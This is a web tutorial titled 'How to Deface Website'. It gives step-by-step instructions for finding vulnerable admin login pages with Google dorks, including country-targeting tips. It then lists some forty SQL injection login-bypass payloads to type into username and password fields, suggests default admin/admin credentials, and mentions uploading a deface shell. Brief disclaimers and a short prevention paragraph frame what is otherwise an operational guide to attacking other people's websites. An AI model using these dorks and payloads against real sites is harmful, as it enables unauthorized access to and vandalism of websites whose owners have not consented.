How to Deface Website

 

Defacement is the term for changing the appearance of a web page in a way that the owner did not intend. Even though this is an illegal and unlawful act, it is important for website owners to be aware of the ways that irresponsible parties can deface a site. In this article, we will discuss one method that is often used in defacement, namely the admin bypass method. We will go into detail about this method, but remember that this knowledge should be used only for lawful and responsible purposes.

What is Admin Bypass Method?

The admin bypass method is a technique used to access the administration page or control panel of a website without having to enter the correct login information. In some cases, websites without adequate security can be vulnerable to attacks using this method. This means that an attacker with sufficient technical knowledge can gain access to the admin panel and make unwanted changes to the web page.

Steps in Doing Deface with Admin Bypass Method.

Here are the general steps used to deface with the admin bypass method:

1. Dorking

The first step is dorking, which is used to find the target website that will be defaced. Dorking returns the sites we are looking for based on the keywords we write. Look for the website to be defaced using the following dork:

Admin. php?id=
Admin/login. php
Login.php intitle:"admin login"
Login.php intitle:"admin area "
Login.php intitle:"administrator "
Administrator.php

Copy one of the keywords above, paste it into the Google search field, and search until you find a website that is vulnerable.

Keep in mind that you also have to develop the dork, such as adding specific country targets, for example site:uk site:id site:de.

2. Exploiting Website Vulnerabilities

Once the vulnerability is identified, the attacker will try to exploit the vulnerability. They will use certain techniques, such as entering malicious code or injecting malicious scripts, to gain access to the admin panel.

You can use some of the admin bypass injection codes below to get into the admin panel.

' or 1=1 limit 1 -- -+
'=''OR'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--

Enter the code in the username and password fields. Sometimes a website still uses the default login data, such as the username admin with the password admin, so it's easier to hack.

3. Changing the Appearance of Web Pages

After successfully gaining access to the admin panel, hackers can change the appearance of the web page as they wish. They can replace the background image, add a deface message, or even delete the entire content.

Usually the hackers upload their deface shell or script, but there are also those who actually report the bug to the owner of the website. This action is called bug bounty or bug hunting.

CONCLUSION

The admin bypass method is one of the techniques that can be used by attackers to deface web pages. Website owners must understand the potential vulnerabilities and take appropriate security measures to protect their websites from attacks. Keeping systems and software updated, using strong passwords, and implementing WAF protection are some of the steps that can help prevent attacks with admin bypass methods.

Never use this knowledge to commit illegal acts or violate the privacy of others. Using expertise responsibly is a principle that must be adhered to by all professionals in the field of information technology.
